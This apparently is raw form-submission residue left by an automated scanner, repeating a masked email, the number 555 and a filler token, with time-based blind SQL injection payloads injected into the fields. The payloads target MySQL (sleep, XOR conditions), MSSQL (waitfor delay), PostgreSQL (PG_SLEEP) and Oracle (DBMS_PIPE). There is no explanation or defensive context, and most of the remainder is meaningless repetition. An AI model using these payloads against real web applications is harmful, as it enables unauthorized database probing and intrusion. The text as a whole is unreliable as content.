(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
ubaTaeCJ
tes****@example.com-1 waitfor delay '0:0:15' --
555
ubaTaeCJ
tes****@example.comI1SFALxc'; waitfor delay '0:0:15' --
555
ubaTaeCJ
tes****@example.com96HDkd9P' OR 197=(SELECT 197 FROM PG_SLEEP(15))--
555
ubaTaeCJ
tes****@example.comOWlGyG9B') OR 708=(SELECT 708 FROM PG_SLEEP(15))--
555
ubaTaeCJ
tes****@example.comvg0bsBSW')) OR 198=(SELECT 198 FROM PG_SLEEP(15))--
555
ubaTaeCJ
tes****@example.com'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
ubaTaeCJ
tes****@example.com'"
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
if(now()=sysdate(),sleep(15),0)
tes****@example.com
555
ubaTaeCJ0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
tes****@example.com
555
ubaTaeCJ0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
tes****@example.com
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
tes****@example.com
555
ubaTaeCJ-1 waitfor delay '0:0:15' --
tes****@example.com
555
ubaTaeCJIY8jER0Z'; waitfor delay '0:0:15' --
tes****@example.com
555
ubaTaeCJwToYRkxm' OR 913=(SELECT 913 FROM PG_SLEEP(15))--
tes****@example.com
555
ubaTaeCJ7xTcZfqJ') OR 292=(SELECT 292 FROM PG_SLEEP(15))--
tes****@example.com
555
ubaTaeCJq67WyUp6')) OR 778=(SELECT 778 FROM PG_SLEEP(15))--
tes****@example.com
555
ubaTaeCJ'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
tes****@example.com
555
ubaTaeCJ'"
tes****@example.com
555
@@MjpGo
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
